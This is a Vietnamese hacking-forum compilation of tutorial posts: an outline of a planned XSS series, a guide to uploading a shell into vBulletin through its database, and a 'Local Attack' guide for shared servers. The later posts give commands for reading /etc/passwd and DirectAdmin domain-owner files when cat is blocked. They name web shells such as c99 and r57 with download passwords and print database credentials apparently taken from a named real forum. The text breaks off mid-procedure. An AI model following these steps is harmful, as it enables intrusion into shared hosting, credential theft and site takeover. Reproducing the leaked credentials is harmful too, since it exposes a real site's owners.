   + Deface website. Tuy nhiên nó chỉ chạy trên trình duyệt phía client và chỉ tấn công vào bề mặt website, không làm thay đổi cấu trúc mã nguồn, cơ sở dữ liệu của website trên server.


[ XSS ] Giới Thiệu Chung

Soleil sẽ góp 1 chút kiên thức về XSS cho ae tham khảo trong 3 bài viết. Bài đầu tiên sẽ mang tính chất giới thiệu. Trong quá trình viết có gì sai sót mong được ae góp ý.

Các nội dung chính:


1- XSS là gì ?

2- Nguyên lý hoạt động XSS

3- Phân loại XSS

4- Mức độ nguy hiểm XSS

5- Phương pháp check site dính lỗ hổng XSS

6- 1 số thao tác khi tấn công bằng XSS

7- Kỹ Thuật Bypass

8- Demo 1 số site dính XSS:

9- Quá trình các bước thực hiện tấn công bằng XSS


Trong bài 2, Soleil sẽ viết từ mục 1 đến mục 5 ^^

[ Up Shell ] Vbulletin Qua Database P.I



Khi thực hiện Local Attack đối với 4rum thì include shell qua database, là 1 kỹ năng không thể thiếu bởi vì thư mục Admincp thông thường không có mấy admin sơ ý đến nỗi quên không change path và đặt file .htaccess bảo vệ. Vì vậy phương pháp include shell database được các attacker sử dụng 1 cách phổ biến

Có 3 cách để include shell, hôm nay soleil sẽ giới thiệu cách thứ nhất.

Giả sử soleil đã có shell  1 site trên cùng server,
Với shell này ta có thể Local Attack sang forum: http://raoonline.net  và thu được thông tin config như sau:

$config['MasterServer']['username'] = 'raovat_forum';
$config['MasterServer']['password'] = '125254857'


Bước 1: Login vào cơ sở dữ liệu:




[ Local Attack] Các Phương Pháp Local Attack


 Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ  bài 2 - Giới thiệu tính năng 1 số shell

      


  *        Nhắc lại trình tự các bước Local Attack

     1-       View danh sách các user trong server
     2-      Tìm  file config.php
     3-      Get thông tin login vào database
     4-      Crack hoặc change pass admin
     5-      Login vào quyên quản trị và upshell

    
     1-      View danh sách các user trên server

Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó


-          Một số câu lệnh để get user:

Lệnh phổ biến nhất:
Cat /etc/passwd

Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt

Less /etc/passwd
./cat/etc/passwd
More /etc/passwd

Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:


Pass download: soleil_vhb
Pass dải nén: ceh.vn

 -          Câu lênh get user & domain

Cat /etc/virtual/domainowners  ( Chỉ dùng đối với direct admin )
               
      2-      Tìm file path file config.php

Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html